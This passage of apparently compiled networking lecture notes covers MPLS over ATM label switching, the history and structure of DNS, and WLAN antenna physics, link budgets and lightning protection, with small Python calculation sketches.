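routing_table = {"10.0.0.0/8": "R3"}
print(build_lfib(local_labels, lib, routing_table))  # {21: (47, 'R3')}
```

If the IGP later chooses R2 as next hop, rebuilding the LFIB picks label 35 from the LIB without any new label exchange.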
Important Databases
FIB
Enabled by default
Session establishment: UDP/TCP port 711
Router (4 bytes)
Well-known technology
Optimum routing
32 bit IP address
Every router uses one VRF for each VPN
On ATM switches
On Routers with ATM interfaces
Legacy ATM switches become MPLS capable
Via firmware upgrade, if existing control processor allows that (LS 1010, Cat 8510, Cat 8540, Cat 5500)
Via external Label Switch Controller (LSC) attached on standard ATM interface (MGX 8850, BPX 8650)
Figure: LSC (Cisco 7500/7200 routers) connected to a BPX 8650 via an ATM link running VSI
Enabling cell-based MPLS on Cisco IOS-based ATM switches is identical
to enabling frame-based MPLS on IOS routers. When enabling cell-based
MPLS on IOS routers with ATM interfaces, the command interface atm
X/X/X tag-switching must be used. The keyword tag-switching here
reserves the VC 0/32 for control messages.
LSC is available for Cisco BPX switches. A special Virtual Switch Interface
(VSI) protocol is used between the standard ATM interface and the LSC. The
VSI basically only supports VC additions and deletions. All higher MPLS
operations are performed by the LSC using VC 0/32.
One main advantage of cell-mode MPLS over ATM is that it avoids NSAP addressing (and
mapping), which is needed to run PNNI.
Cell-mode MPLS Cells
ATM Switches can only switch VPI/VCI, no MPLS labels!
Only the topmost label is inserted in the VPI/VCI field
Other reserved VPI/VCI fields are used for LDP/TDP and
routing updates
Note: Typically only a few VPI/VCI combinations are
supported by each switch
Labels are a very scarce resource !!!
Per-interface label allocation
Figure: frame mode (Layer 2 | MPLS header | IP packet) versus cell mode, where the MPLS header and IP packet are carried in AAL5 over ATM: the first cell carries the MPLS header and the beginning of the IP packet, subsequent cells carry the rest of the IP packet (cont.).
The top label is always copied into the (VPI/) VCI fields. LDP/TDP sessions
are established via reserved VPI/VCI labels. Typically an ATM switch only
provides a few VPI/VCI numbers, so it is difficult to accommodate all MPLS labels
used in a router network.
Note that LC-ATM provides per-interface label allocation since the ATM
switching matrix (= LFIB) always contains the incoming interface! That is, the
same labels can be reused on different interfaces of the same machine. This
has a security advantage: labeled packets are only accepted on those interfaces
where the labels had previously been assigned.
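Per-interface label allocation follows from keying the switching matrix on the incoming interface as well as on VPI/VCI. Here is a minimal Python sketch with hypothetical interface names and VPI/VCI values.

```python
# LC-ATM switching matrix (= LFIB):
# (incoming interface, VPI, VCI) -> (outgoing interface, VPI, VCI)
switching_matrix = {
    ("ATM0", 1, 40): ("ATM2", 1, 77),
    ("ATM1", 1, 40): ("ATM3", 1, 52),  # label 1/40 reused on another interface
}


def switch_cell(in_iface, vpi, vci):
    """Return the outgoing (interface, VPI, VCI), or None if the cell is dropped.

    A label is only valid on the interface where it was assigned, so the same
    VPI/VCI arriving on any other interface finds no entry.
    """
    return switching_matrix.get((in_iface, vpi, vci))


print(switch_cell("ATM0", 1, 40))  # ('ATM2', 1, 77)
print(switch_cell("ATM2", 1, 40))  # None
```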
Basic Principles Summary
MPLS Layer 2.5 packet is sent via AAL5
Top-of-stack label is always copied into VPI/VCI field
Per default: VPI=1, range can be configured
LDP, TDP and routing protocols are sent in-band in VC 0/32
by default (IETF)
Other channel can be configured
Out-band control channel typically not implemented (e.g.
Ethernet)
ATM switches typically perform control-driven label
requests downstream
Based on RT content, not actual data flow
Recursive process (request/response: "Ordered Control")
Figure: the request "Need label for net 10" is passed from switch to switch (steps 1 to 3); the replies "Use label 1/45", "Use label 1/31" and "Use label 1/99" travel back (steps 4 to 6).
The main difference between frame-based MPLS in routers and cell-based
MPLS is the following: routers can handle both IP packets (LDP, TDP,
routing updates) and labeled packets (MPLS data packets on layer 2.5), but
ATM switches can ONLY handle VPI/VCI-labeled packets.
As the top-of-stack MPLS label is now always used in the VPI/VCI field, there
must be a dedicated VC for control packets such as LDP, TDP, and routing
protocols.
Per default, only the 16-bit VCI value carries the label value, because VPI
values are a scarce resource; therefore the VPI value is set to 1 per default.
Optionally, a VPI range can be specified.
The MPLS control VC is by default configured on VC 0/32 and must use
LLC/SNAP encapsulation of IP packets as defined in RFC 1483. The
corresponding IOS keyword is aal5snap.
Label Request Procedure
A router requests a label for every destination with next
hop reachable via LC-ATM interface
An ATM switch can only allocate an incoming label if it
already has an outgoing label
Thus a label request can only be answered after the outgoing label
has been obtained
"Ordered control"
LSRs can always assign an incoming label
"Independent control"
LFIB = ATM switching matrix
Figure: the request "Need label for net 10" is passed downstream (steps 1 to 3); the replies "Use label 1/45", "Use label 1/31" and "Use label 1/99" travel back upstream (steps 4 to 6).
Labels are requested via LDP/TDP as soon as an edge router (LSR) learns
about a destination which is reachable via a next hop through an LC-ATM
interface.
Each ATM-LSR can only allocate a label for this (requested) destination when
it already knows an outgoing label. Therefore the response message must be
delayed, and another label request is sent downstream. Only when the last LSR
on the right side (i.e. the egress ATM-LSR, which needs L3
functionality) receives the request does it allocate a label and send a response to
the label request. Note that this last (egress) ATM-LSR has no outgoing label,
as it is directly connected to the destination network. We assume that "net
10" is located at the right side next to the rightmost LSR.
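The recursive request/response order can be reproduced with a short Python sketch. It assumes a simple chain of ATM-LSRs with the destination behind the last one. Each LSR allocates VCIs from its own counter with VPI 1; the start value 33 and the LSR names are hypothetical. The sketch models only the message order, not LDP/TDP itself.

```python
import itertools


def ordered_control(path, prefix, vpi=1, first_vci=33):
    """Return the label request/reply messages in the order they are sent.

    path: LSR names from the ingress to the egress LSR (which is attached to
    `prefix`). Each LSR answers a request only after it has obtained its own
    outgoing label from downstream ("ordered control").
    """
    pools = {lsr: itertools.count(first_vci) for lsr in path}  # per-LSR label space
    log = []

    def request(i):
        upstream, downstream = path[i - 1], path[i]
        log.append(f"{upstream} -> {downstream}: Need label for {prefix}")
        if i < len(path) - 1:
            request(i + 1)  # not the egress: first get the outgoing label
        vci = next(pools[downstream])  # now the incoming label can be allocated
        log.append(f"{downstream} -> {upstream}: Use label {vpi}/{vci}")

    request(1)
    return log


for message in ordered_control(["LSR1", "LSR2", "LSR3", "LSR4"], "net 10"):
    print(message)
```

The first reply comes from the egress LSR, and the ingress router receives its label last. This is the delay described in the text.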
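Reuse of Downstream Labels
Reusing downstream label leads to
interleaving of IP packets ! (cells of AAL5 frames from different upstream
neighbors would be mixed on one outgoing VC and could no longer be reassembled)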
Through the 1970s, the ARPAnet was a small community of a few hundred hosts.
A single file called HOSTS.TXT contained a name-to-address mapping for every
host connected to the ARPAnet. The familiar UNIX host table, /etc/hosts, was
compiled from HOSTS.TXT.
HOSTS.TXT was maintained by SRI's Network Information Center ("the NIC")
and distributed from a single host, SRI-NIC. SRI is the Stanford Research
Institute in Menlo Park, California. SRI conducts research into many different
areas, including computer networking.
ARPAnet administrators typically emailed any changes to the NIC and
periodically fetched the current HOSTS.TXT by FTP. Any changes were
compiled into a new HOSTS.TXT, typically once or twice a week.
Hostfile Problems
Centrally maintained by Network
Information Center (NIC)
Copied by all hosts
Scalability problem
Consistency problem
Maintenance problem
Unfortunately this approach did not scale, as the ARPAnet was growing faster and
faster. Every additional host not only caused another line in HOSTS.TXT, but also
produced additional update traffic from and to SRI-NIC. Since each of the N hosts
had to fetch a file whose size grows with N, the total network bandwidth necessary
to distribute a new version of the hosts file is proportional to the square of the total
number of hosts! In those days memory was very expensive, and additionally, modifying
hostnames on a local network became visible to the Internet only after a long
(distribution) delay. Furthermore, the name space was not yet hierarchically
organized, and this "directory" became chaotic.
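The quadratic growth can be checked with a few lines of Python. The 64-byte entry size is an arbitrary assumption; only the ratio between the results matters.

```python
def hosts_file_distribution_bytes(n_hosts, bytes_per_entry=64):
    """Total bytes transferred when every host fetches a fresh HOSTS.TXT.

    The file holds one entry per host, and all n hosts download it,
    so the total is n * (n * bytes_per_entry), i.e. proportional to n**2.
    """
    file_size = n_hosts * bytes_per_entry
    return n_hosts * file_size


for n in (100, 1_000, 10_000):
    print(n, hosts_file_distribution_bytes(n))
```

Ten times more hosts means a hundred times more distribution traffic per update.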
For example, name collisions occurred, that is, two hosts in HOSTS.TXT could
have the same name. While the NIC could assign unique addresses, it had no
authority over host names. There was nothing to prevent someone from adding a
host with a conflicting name and violating the rules of the name organization. For
example, if somebody added a host with the same name as a major mail hub, he
could disrupt mail service for many users.
Decentralizing the administration would eliminate the single-host bottleneck
and relieve the traffic problem, and local management would make the task of
keeping data up to date much easier. A new system should use a hierarchical name
space to name hosts; this would ensure the uniqueness of names.
1984: DNS
Paul Mockapetris (IAB) created DNS
Distributed database
Hard to remember
DNS maps addresses to names
DNS allows hierarchical tree of names
No name collisions anymore!
Concatenation results in Fully Qualified Domain Name (FQDN)
Figure: the DNS tree. Root domain "." with TLDs COM, ORG, BIZ, EDU, AT, ...; 2nd level domains such as DEBIAN (under ORG) and AC (under AT); 3rd level domain TUWIEN (under AC.AT). Example FQDNs: WWW.DEBIAN.ORG. (192.25.206.10), GD.TUWIEN.AC.AT. (192.35.244.50), WWW.TUWIEN.AC.AT. (128.130.102.130).
Note that IP network addresses are flat. Although we often call IP addresses
structured, the net-IDs are indeed flat, that is, they have no further structure.
Moreover, IP address assignment had been done rather arbitrarily without taking
semantic or logical considerations into account. But most importantly:
people cannot easily remember a 32-bit number (written as four decimal bytes) by heart.
The DNS maps the whole "flat" IP address space into a logical and hierarchical
tree of names. The tree originates at the root domain, which is represented by a
single dot ".", while all other domains (first level domains, second level
domains, and so on) are attached below the root. The first level domains are
also known as "Top Level Domains" (TLDs).
The leaves of this tree and each node in between can be specified by
concatenating all names from there up to the root. This is called a "Fully Qualified
Domain Name" (FQDN).
Note: This tree does not reflect any physical or geographical location of hosts!
For example, ten different hosts might be physically located in different networks,
each in a different country, but all can belong to the same domain!
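Building FQDNs by concatenation can be sketched in Python with a nested dictionary holding part of the example tree. Only the ORG and AT branches are included, and the function name `fqdns` is hypothetical.

```python
def fqdns(tree, suffix=""):
    """Yield the FQDN of every node by appending the parent names up to the root.

    tree: nested dict, label -> subtree. The trailing dot stands for the root.
    """
    for label, children in tree.items():
        name = f"{label}.{suffix}"
        yield name
        yield from fqdns(children, name)


dns_tree = {
    "ORG": {"DEBIAN": {"WWW": {}}},
    "AT": {"AC": {"TUWIEN": {"WWW": {}, "GD": {}}}},
}
for name in fqdns(dns_tree):
    print(name)
```

Two hosts are both labeled WWW, but their FQDNs differ. This is why the hierarchy removes name collisions.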
Name Servers
The DNS tree is realized by Name Servers
The Domain Name Tree does NOT reflect
the physical network structure!
Each NS cares for a subset of the DNS
tree: zones
Flexible mappings
Concatenated labels
from the root to the
current domain
Maintained by ICANN
Is non-authoritative
IPsec/TLS grade
VoIP support
Formerly known as
Wireless Ethernet Compatibility Alliance
(WECA)
Certified substandards
Interference tolerant
Fewer multipath problems
Figure: sender and receiver at distance r
Power density at the receiver: $S_R = \frac{P_S G_S}{4\pi r^2}$
Hertz' dipole: $G = 1.5$
$\lambda/2$ dipole: $G = 1.64$ (= 2.14 dBi = 0 dBd)
Parabolic dish with 4 m diameter at 2.4 GHz: $G = 10^4$
Power at receiver's antenna output: $P_R = S_R A_e = P_S G_S G_R \left(\frac{\lambda}{4\pi r}\right)^2$
$A_e$ ... effective antenna surface ("aperture"), $A_e = \frac{G_R \lambda^2}{4\pi}$.
The equation for the received power is sometimes also called "Friis' transmission
equation".
Note that for real-world (especially indoor) calculations, the effective antenna
gain is smaller because of obstacles, multipath, etc.
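Friis' transmission equation is easy to evaluate numerically. The following Python sketch uses linear gains and watts. The 100 mW, 100 m and 2.4 GHz values are only an example, and isotropic antennas (G = 1) are assumed.

```python
import math

C = 299_792_458.0  # speed of light in m/s


def friis_received_power_w(p_s_w, g_s, g_r, r_m, f_hz):
    """P_R = P_S * G_S * G_R * (lambda / (4*pi*r))**2 with linear gains."""
    wavelength = C / f_hz
    return p_s_w * g_s * g_r * (wavelength / (4 * math.pi * r_m)) ** 2


def w_to_dbm(p_w):
    """Convert watts to dBm."""
    return 10 * math.log10(p_w / 1e-3)


p_r = friis_received_power_w(0.1, 1.0, 1.0, 100.0, 2.4e9)
print(f"{w_to_dbm(p_r):.2f} dBm")  # -60.05 dBm
```

Because G_S and G_R enter the product symmetrically, swapping sender and receiver gives the same result, in line with the reciprocity theorem.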
Polarization
Linear polarization
Vertical or horizontal
Requires linear antenna elements
Elliptical polarization
Circular polarization is only a special case
Requires bent antenna elements
Transmitter and receiver antennas should be aligned for same
polarization to achieve best performance
Otherwise "infinite" attenuation with "opposite" antennas
Or 3 dB attenuation between linear and circular antennas
Polarization changes with diffraction and reflection
Vertical polarization is preferred for long range transmission
(ground effect attenuates the signal power in horizontal
polarization)
Circular polarization antennas mitigate the effect of reflections
Principle also used for GPS
See helical antennas (for example)
Vertical polarization is the first choice for WLAN applications because most
deployments require maximizing the distance in the horizontal direction. As
can be seen in antenna diagrams, vertically polarized antennas are perfectly suited
for horizontal transmissions.
Vertical polarization is also preferred for long range transmission because, over
long ranges, the ground effect attenuates the signal power in the horizontally
polarized case.
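The "infinite" and "3 dB" figures on the slide are consistent with the usual polarization loss factor. For two linear antennas this factor is cos² of the misalignment angle; between linear and circular antennas it is 1/2. Those relations are standard textbook results rather than statements from this text, and the function name below is hypothetical.

```python
import math

LINEAR_TO_CIRCULAR_LOSS_DB = 10 * math.log10(2)  # half the power, about 3 dB


def linear_mismatch_loss_db(angle_deg):
    """Loss between two linear antennas misaligned by angle_deg.

    Uses the polarization loss factor cos^2(angle).
    """
    plf = math.cos(math.radians(angle_deg)) ** 2
    if plf < 1e-12:
        return math.inf  # crossed ("opposite") antennas
    return 10 * math.log10(1 / plf)


for angle in (0, 45, 90):
    print(angle, round(linear_mismatch_loss_db(angle), 2))
```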
Other Antenna Facts
Impedance Matching
Free space impedance is 377 Ohm
Antenna cables have 50 Ohm (typically)
$s = U_{\max} / U_{\min} \geq 1$ (VSWR)
s = 1 means ideal impedance matching
s > 1 means reflections and high ripples
=> higher rms values
=> higher loss
$Z_0 = \sqrt{\mu_0 / \varepsilon_0} \approx 377\,\Omega$ (far field).
Voltage maximum on open end, no current.
$U_{\max} = |U_{\mathrm{incident}}| + |U_{\mathrm{reflection}}|$
$U_{\min} = |U_{\mathrm{incident}}| - |U_{\mathrm{reflection}}|$
VSWR should be measured at the antenna feedpoint (where the reflection occurs),
which is typically not possible.
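The VSWR definition translates directly into Python. The second function uses the reflection coefficient Γ = (Z_L - Z_0)/(Z_L + Z_0), a standard relation not stated in the text. The 75 Ohm load is only an example of a mismatched antenna on a 50 Ohm cable.

```python
def vswr_from_voltages(u_incident, u_reflected):
    """s = Umax / Umin with Umax = |Ui| + |Ur| and Umin = |Ui| - |Ur|."""
    u_max = abs(u_incident) + abs(u_reflected)
    u_min = abs(u_incident) - abs(u_reflected)
    return float("inf") if u_min == 0 else u_max / u_min


def vswr_from_load(z_load, z0=50.0):
    """Same ratio via the reflection coefficient Gamma = (ZL - Z0) / (ZL + Z0)."""
    gamma = abs((z_load - z0) / (z_load + z0))
    return float("inf") if gamma == 1 else (1 + gamma) / (1 - gamma)


print(vswr_from_load(50.0))                    # 1.0: ideal matching
print(round(vswr_from_load(75.0), 2))          # 1.5
print(round(vswr_from_voltages(1.0, 0.2), 2))  # 1.5
```

Both functions agree because |U_reflection| / |U_incident| equals |Γ|.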
Other Antenna Facts
Theorem of Reciprocity
Typically 3-8 %
The reciprocity theorem was first stated by Rayleigh and Helmholtz and was
later applied to the problem of antennas by Carson. This theorem basically says
that the antenna parameters remain the same no matter whether the antenna is
used for sending or receiving. More practically, when using two different
antennas, one for sending and the other for receiving, we would measure the same
currents on the receiving antenna even if we swapped TX and RX. The reciprocity
theorem can be proved from Maxwell's equations and is only valid in isotropic
media between the antennas (e.g. certain ferrites are not isotropic).
Mostly the antenna endpoints contribute to the shortening effect, while the inner
half-wave "pieces" remain constant. Therefore, the longer the antenna, the less
dramatic the effect.
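This sketch assumes that the "Typically 3-8 %" on the slide refers to the shortening of a half-wave dipole relative to λ/2. The surrounding notes suggest this, but the slide does not say it explicitly. Under that assumption, the physical length can be estimated in Python; the 5 % value and the 2.4 GHz frequency are example choices.

```python
C = 299_792_458.0  # speed of light in m/s


def half_wave_dipole_length_mm(f_hz, shortening=0.05):
    """Physical length of a lambda/2 dipole after applying a shortening factor."""
    half_wave_mm = C / f_hz / 2 * 1000
    return half_wave_mm * (1 - shortening)


print(round(half_wave_dipole_length_mm(2.4e9, 0.0), 1))   # 62.5 (ideal lambda/2)
print(round(half_wave_dipole_length_mm(2.4e9, 0.05), 1))  # 59.3
```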
Wave Propagation
Free space:
Fields E, H ~ 1/r
Fields E, H ~ $e^{-\alpha r}$
The higher the frequencies the lower the
effect of surface waves
"Quasi-optical" propagation
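The 'inverse square law' is only valid for powers, not for field strengths: since
the power density is proportional to the product of E and H, fields decaying with 1/r
give a power density decaying with 1/r².
Note that in general the energy is radiated over multiple wave components; for
example, surface waves may also exist along the earth's surface (usually only with
longer wavelengths).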
Antenna Patterns
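Field strengths as polar diagram
$\lambda_0 = 300 / f_{\mathrm{MHz}}$ (in m)
$\lambda_{\mathrm{cut}} = 1.706 \cdot D$
$\frac{1}{\lambda_0^2} = \frac{1}{\lambda_{\mathrm{cut}}^2} + \frac{1}{\lambda_g^2}$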
Waveguide antennas act as an open waveguide: standing waves and modes, high-pass
behavior. Goal: Find the point of maximum field strength of the standing
wave.
It is important to notice that the standing (guide) wavelength λg is not the same as
the free-space wavelength λ0 calculated from the RF signal. In large tubes (nearly
open air), λg and λ0 are almost the same, but when the tube diameter becomes smaller,
λg increases until it finally becomes infinite. This corresponds to the
diameter at which the RF signal does not enter the tube at all. So the waveguide tube
acts as a high-pass filter which limits the wavelength to λcut ≈ 1.706 × D. λ0 can be
calculated from the nominal frequency: λ0/mm ≈ 300/(f/GHz).
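The waveguide relation 1/λ0² = 1/λcut² + 1/λg² can be solved for λg in Python. The sketch uses λ0/mm = 300/(f/GHz) and λcut = 1.706 × D from the text. The 100 mm tube diameter is a hypothetical example, and the result is only meaningful above cutoff.

```python
import math


def guide_wavelength_mm(f_ghz, diameter_mm):
    """Guide wavelength lambda_g in a circular waveguide, in mm.

    lambda_0 = 300 / f[GHz] (mm), lambda_cut = 1.706 * D, and
    1/lambda_0**2 = 1/lambda_cut**2 + 1/lambda_g**2.
    Returns math.inf at or below cutoff (no propagation into the tube).
    """
    lam0 = 300.0 / f_ghz
    lam_cut = 1.706 * diameter_mm
    k = 1 / lam0**2 - 1 / lam_cut**2
    return math.inf if k <= 0 else 1 / math.sqrt(k)


print(round(guide_wavelength_mm(2.44, 100.0)))  # about 177 mm
print(guide_wavelength_mm(2.44, 60.0))          # inf: tube too narrow
```

As the text states, λg approaches λ0 for very wide tubes and grows without bound as the diameter approaches cutoff.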
FSL
Free Space Loss (FSL)
Additional 6 dB loss
Exponential law
$\mathrm{FSL} = \left(\frac{4\pi r}{\lambda}\right)^2$
Free Space Loss: No Fresnel zone encroachment assumed!
In German it is called "Freiraumdämpfung".
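The FSL formula can be evaluated in dB with Python. This sketch also shows that doubling the distance adds 20·log10(2) ≈ 6 dB. That is one plausible reading of the "Additional 6 dB loss" bullet; doubling the frequency has the same effect.

```python
import math

C = 299_792_458.0  # speed of light in m/s


def fsl_db(r_m, f_hz):
    """Free space loss in dB: 10*log10((4*pi*r/lambda)**2)."""
    wavelength = C / f_hz
    return 20 * math.log10(4 * math.pi * r_m / wavelength)


print(round(fsl_db(1000, 2.4e9), 2))                         # 100.05
print(round(fsl_db(2000, 2.4e9) - fsl_db(1000, 2.4e9), 2))  # 6.02
```

The value of about 100 dB at 1 km and 2.4 GHz matches the quick formula FSL_dB = 20 log(r_km) + 100 for that band.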
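FSL - Simple Formulas
General:
$\mathrm{FSL}_{\mathrm{dB}} = 20\log(f_{\mathrm{GHz}}) + 20\log(r_{\mathrm{km}}) + 92.45$
$\mathrm{FSL}_{\mathrm{dB}} = 22 + 20\log(r/\lambda)$
$\mathrm{FSL}_{\mathrm{dB}} = 20\log(f_{\mathrm{MHz}}) + 20\log(r_{\mathrm{km}}) + 32.45$
2.4 GHz:
$\mathrm{FSL}_{\mathrm{dB}} = 20\log(r_{\mathrm{km}}) + 100$, inverse: $r_{\mathrm{km}} = 10^{(\mathrm{FSL}-100)/20}$
5.3 GHz:
$\mathrm{FSL}_{\mathrm{dB}} = 20\log(r_{\mathrm{km}}) + 107$, inverse: $r_{\mathrm{km}} = 10^{(\mathrm{FSL}-107)/20}$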
The formulas highlighted in blue are the most important for quick estimations of
the Free Space Loss.
Note that the inverse formulas are very sensitive to their exponent: slight
differences in the FSL result in huge deviations of the distance (every additional
6 dB doubles the distance).
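The sensitivity of the inverse formulas shows up when they are evaluated for a few FSL values. The following Python sketch uses the quick-formula constants 100 dB (2.4 GHz) and 107 dB (5.3 GHz); the function name is hypothetical.

```python
def distance_km(fsl_db, constant_db=100.0):
    """Inverse quick formula r_km = 10 ** ((FSL - constant_db) / 20).

    constant_db = 100 corresponds to 2.4 GHz, 107 to 5.3 GHz.
    """
    return 10 ** ((fsl_db - constant_db) / 20)


for loss in (114, 120, 126):
    print(loss, "dB ->", round(distance_km(loss), 1), "km")  # 5.0, 10.0, 20.0 km
```

An uncertainty of only ±6 dB in the loss estimate therefore halves or doubles the predicted range.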
GeneraI Attenuation Considerations
For isotropic antennas in free space, the
attenuation at 5 GHz is higher
Consider static and dynamic configurations
Multipath problems
"High signal strengths but low quality"
Indoor office signal intensity map
(source unknown)
Source: www.intersil.com
This picture shows the usefulness of diversity antennas.
Similar pictures can easily be made with 4NEC2X available for Windows (or
NEC2, the free Linux version).
Why are bigger antennas better?
Assume we comply with 20 dBm EIRP
Then this can be reached in various ways:
Additionally, SNR is improved with higher gains
Therefore, try to maximize antenna gains !!!

P_TX (both stations)   Antenna gain (both stations)   Received power
17 dBm                 3 dBi                          FSL + 17 dBm + 6 dBi
10 dBm                 10 dBi                         FSL + 10 dBm + 20 dBi
0 dBm                  20 dBi                         FSL + 0 dBm + 40 dBi
It is important to understand the true importance of a high-gain antenna. While
the TX power is limited by regulation, it makes no difference whether a perfect
omni antenna with 100 mW or a 20 dBi dish with 1 mW is used.
But when signals are received, the antenna gain (of the receiver)
significantly increases the sensitivity and therefore lengthens the maximum
distance.
Note that in the yellow boxes above the FSL is assumed to have the same
(unknown) value each time. What changes is the TX power and the antenna gain.
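The three rows can be recomputed in Python. The sketch treats the FSL as a positive loss in dB that is subtracted. The value of 100 dB is an arbitrary placeholder, since the slide leaves it unknown; only the differences between the rows matter.

```python
def received_power_dbm(p_tx_dbm, gain_dbi, fsl_db):
    """RX power for a link where both stations use the same antenna gain."""
    return p_tx_dbm + gain_dbi + gain_dbi - fsl_db


FSL_DB = 100.0  # placeholder: identical (unknown) loss for every row
for p_tx, gain in ((17, 3), (10, 10), (0, 20)):
    eirp = p_tx + gain
    p_rx = received_power_dbm(p_tx, gain, FSL_DB)
    print(f"P_TX={p_tx} dBm, G={gain} dBi: EIRP={eirp} dBm, P_RX={p_rx:.0f} dBm")
```

The EIRP is 20 dBm in every row, yet the received power improves by 17 dB from the first to the last row. The improvement comes entirely from the receiver's antenna gain.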
Practical 2.4 GHz Distance Limits
ETSI limits 2.4 GHz EIRP to 20 dBm
(Also for P2P links)
A minimum RX power of -80 dBm can be
assumed as practical limit
Then a maximum FSL of -120 dB is allowed
This results in a maximum distance of 10 km
Figure: two stations, each with P = 0 dBm and G = 20 dBi; FSL = -120 dB => 10 km
The typical practical distance limit of wireless bridges operating in an ETSI
domain at 2.4 GHz is approximately 10 km.
Assuming an RX power of -80 dBm, a data rate of 11 Mbit/s can easily be
achieved (the minimum signal level for 11 Mbit/s is -85 dBm or less).
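The chain from link budget to distance can be written as a short Python function. It uses the values from this slide and the 2.4 GHz quick formula r_km = 10^((FSL - 100)/20); the FSL is handled as a positive loss here, and the function name is hypothetical.

```python
def max_distance(p_tx_dbm, g_tx_dbi, g_rx_dbi, rx_min_dbm, constant_db=100.0):
    """Return (largest tolerable FSL in dB, distance in km) for a link budget.

    constant_db = 100 is the 2.4 GHz quick-formula constant.
    """
    max_fsl_db = p_tx_dbm + g_tx_dbi + g_rx_dbi - rx_min_dbm
    return max_fsl_db, 10 ** ((max_fsl_db - constant_db) / 20)


print(max_distance(0, 20, 20, -80))  # (120, 10.0)
```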
Practical 5 GHz Distance Limits
Completely different situation
HIPERLAN band (5470-5725 MHz) released for WiFi
1Mbps 500 ns
Note: Delay spread in wide areas with lots of multipaths
can reach several µs!
Rule of thumb: Path length difference of 15 meters leads to 50
ns spreading
Solutions:
Directive antennas
Circular polarization
OFDM
Figure: narrow pulses from the sender arrive as spread pulses at the receiver (Inter-Symbol Interference)
In order to minimize the reflection rate, it is better to use directive antennas, even
if you are at short distance and in line of sight. Another possibility is to use
circularly polarized antennas (helical antennas), which cancel the first reflections
quite well: the reflected signal has the opposite direction of rotation (left becomes
right), so the receiver is insensitive to this reflected signal. The helical antenna
would be ideal.
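The rule of thumb follows from dividing the path length difference by the speed of light, as this Python sketch shows. The 1000 ns symbol duration in the second example is a hypothetical value chosen only to illustrate how an echo eats into a symbol period; the function names are also hypothetical.

```python
C = 299_792_458.0  # speed of light in m/s


def delay_spread_ns(path_difference_m):
    """Extra delay of a reflected path relative to the direct path, in ns."""
    return path_difference_m / C * 1e9


def isi_fraction(path_difference_m, symbol_duration_ns):
    """Share of one symbol period that the echo overlaps (rough ISI indicator)."""
    return delay_spread_ns(path_difference_m) / symbol_duration_ns


print(round(delay_spread_ns(15)))          # 50
print(round(isi_fraction(150, 1000), 2))   # 0.5
```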
Outdoor Antenna Safety
Antenna cables connect indoor and
outdoor EM-environment
Prone to (in-) direct lightning
Can pick up electrical fields (=>
currents) through dry air or EMI
There is no 100% solution to protect
your equipment !!!
But good chances to protect the
indoor area (health, fire)
Use lightning arrestors (antenna
cable) or grounding blocks
(pwr/console coax) against surges
DC-continuity type needed for WLAN
with coax power supply (gas tube or
spark gap)
Proper low-impedance grounding
critical (not that easy!)
Keep tower and coax at same
potential (to prevent "side flashes")
Figure: 0-3 GHz Lightning Protector (HyperGain Model HGLN-F); Dual F Grounding Block (F-connectors are used in Aironet 1400 series for the bridge supply cables); RP-TNC connectors (Aironet 350 series, antenna cables)
WLAN equipment can be damaged by various electrical disturbances such as power line switching transients and voltage surges, as well as static build-up on outside wires and antennas.
Arrestors for coaxial cable also come in several types, each of which functions somewhat differently. DC blocking-type arrestors have a fixed frequency range and must be selected for a specific application. Their main advantage is that they present a high-impedance path to the frequencies found in lightning (less than 1 MHz) while offering a low impedance to signals created by your radio.
Arrestors that have DC continuity (gas tube and spark gap types) are broadband and can be used over a wider frequency range than the DC-blocking types. Also, in installations where the coax is also used to supply voltages to a remote device (such as a mast-mounted preamp or remote coax switch), the DC continuity-type arrestor must be used.
The Cisco Aironet Lightning Arrestor prevents energy surges from reaching the RF equipment by the shunting effect of the device. Surges are limited to less than 50 volts in about 0.0000001 seconds (100 ns). A typical lightning surge lasts about 0.000002 seconds (2 µs). The accepted IEEE transient (surge) suppression is 8 µs. The Lightning Arrestor is a 50-ohm transmission line with a gas discharge tube positioned between the center conductor and ground. This gas discharge tube changes from an open circuit to a short circuit almost instantaneously in the presence of voltage and energy surges, providing a path to ground for the energy surge.
Note: Lightning can occur even without a thunderstorm, whenever and wherever there is a sufficient charge build-up.
Note: Some towers, especially AM radio towers, are not grounded because the tower is actually isolated from ground, being used as the antenna. This is known as a hot tower, and you must isolate the bridge and all grounds from this type of tower.
However, the ARRL Antenna Book states, "The best protection from lightning is to disconnect all antennas from equipment and disconnect all equipment from power lines."
When lightning strikes, it will always try to find the shortest electrical path to ground. Proper grounding is critical to lightning protection. Because lightning contains energy over a wide range of frequencies, the path to ground must present a low impedance across that whole range.
World Record (early 2005)
200 km without amplifiers
But an EIRP beyond legal limits
See
http://www.wifiworldrecord.com/
http://www.wifi-shootout.com/
[Figure: 200 km link between Nevada and Utah using a 4 m dish and a 3 m dish, each fed with 300 mW; a 3 m dish gives about 35 dBi]
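To see why the EIRP was far beyond legal limits, here is a minimal sketch that computes EIRP from the slide's figures (300 mW into a dish of about 35 dBi). Cable and connector losses are assumed to be zero, which somewhat overstates the real value; the function names are illustrative.

```python
import math


def mw_to_dbm(power_mw: float) -> float:
    """Convert milliwatts to dBm."""
    return 10 * math.log10(power_mw)


def dbm_to_watt(power_dbm: float) -> float:
    """Convert dBm back to watts."""
    return 10 ** (power_dbm / 10) / 1000


def eirp_dbm(tx_power_mw: float, antenna_gain_dbi: float, cable_loss_db: float = 0.0) -> float:
    """EIRP = transmit power + antenna gain - cable/connector losses (all in dB units)."""
    return mw_to_dbm(tx_power_mw) + antenna_gain_dbi - cable_loss_db


eirp = eirp_dbm(300, 35)  # 300 mW into a ~35 dBi dish, losses assumed to be zero
print(f"EIRP = {eirp:.1f} dBm, about {dbm_to_watt(eirp):.0f} W")
```

With these numbers the result is roughly 59.8 dBm, an equivalent isotropically radiated power of close to 1 kW; real cable losses would be passed in via `cable_loss_db`.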
Tomorrow's Antenna Design
Microwave antenna design using genetic algorithms
http://ic.arc.nasa.gov/projects/esg/research/antenna.htm
WLAN Protocol
In this chapter we discuss basic communication issues, such as synchronization,
coding, scrambling, modulation, and so on.
Protocol Layers
MAC layer
Medium access control
Fragmentation
PHY layer = PLCP + PMD
Established signal for controlling Clear Channel Assessment (CCA)
Service access point
Physical Layer Convergence Protocol (PLCP)
Synchronization and SFD
Header
Physical Medium Dependent (PMD)
Modulation and coding
[Figure: IEEE 802 architecture. 802.2 Logical Link Control (LLC) sits on top of the Media Access Control (MAC) variants 802.3 CSMA/CD, 802.4 Token Bus, 802.5 Token Ring, 802.6 DQDB, 802.12 Demand Priority and 802.11 Wireless, each with its own PHY; 802.1 (management, bridging (802.1D), QoS, VLAN, ...) spans all of them. PLCP = Physical Layer Convergence Protocol, PMD = Physical Media Dependent.]
